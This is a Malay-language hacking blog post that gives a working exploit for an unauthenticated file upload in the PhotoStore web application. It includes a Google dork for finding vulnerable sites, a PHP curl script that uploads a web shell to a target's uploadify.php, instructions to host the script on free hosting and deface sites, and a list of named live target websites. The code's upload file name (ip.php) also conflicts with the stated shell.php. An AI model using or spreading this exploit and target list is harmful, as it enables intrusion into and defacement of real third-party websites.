Assalamualaikum dan salam sejahtera. harini aku nak share exploit webapps yang boleh upload shell. lepas tu korang boleh deface.
Webapps yang terdedah kepada vulnerablility ini ialah PhotoStore.
ok jom..
1. Mula-mula korang cari website target guna google dork. cara guna google dork korang copy dan paste dork dibawah kat google. nnti keluar web yg terdedah kepada exploit ini.
Dork : "Powered By PhotoStore"
Lepas tu pilih mana-mana website.
2. Sekarang korang perlu copy code exploit dibawah.
<?php
$uploadfile="ip.php";
$ch = curl_init("http://target.com/assets/uploadify/old/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'folder'=>'/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Korang copy dan paste di dalam notepad.
sekarang korang tengok di dalam code yang korang copy tadi. ada link kan? tukar "target.com" kepada website yang korang dapat dari google dork tadi.
Kemudian save as :
File name : exploit.php
Save as type : All files
3. Sekarang korang upload masuk ke webhosting. boleh register free di x90x.net atau hostinger.my
Kemudian korang juga perlu upload shell ke dalam webhosting korang tu. pastikan shell tu terletak di dalam direktori yang sama dengan file exploit.shell korang mesti nama "shell.php"
Jadi dalam webhosting korang akan ada dua file, iaitu "exploit.php" dan "shell.php" .
4. Baiklah sekarang semua dah siap, korang boleh guna exploit ni dengan menjalankan script exploit.php tadi.
http://link-hosting-korang/exploit.php
5. Kemudian untuk kalau berjaya upload shell, shell akan berada di root direktory. contoh :
http://target.com/shell.php
Baiklah semoga berjaya!
Live target :
photocity.co.za
www.rogueeventdigitals.co.uk
www.saladeprensa.co/
www.stockthatphoto.co.uk/
photokaya.com/ip.php
Incoming Search Terms :
No comments:
Post a Comment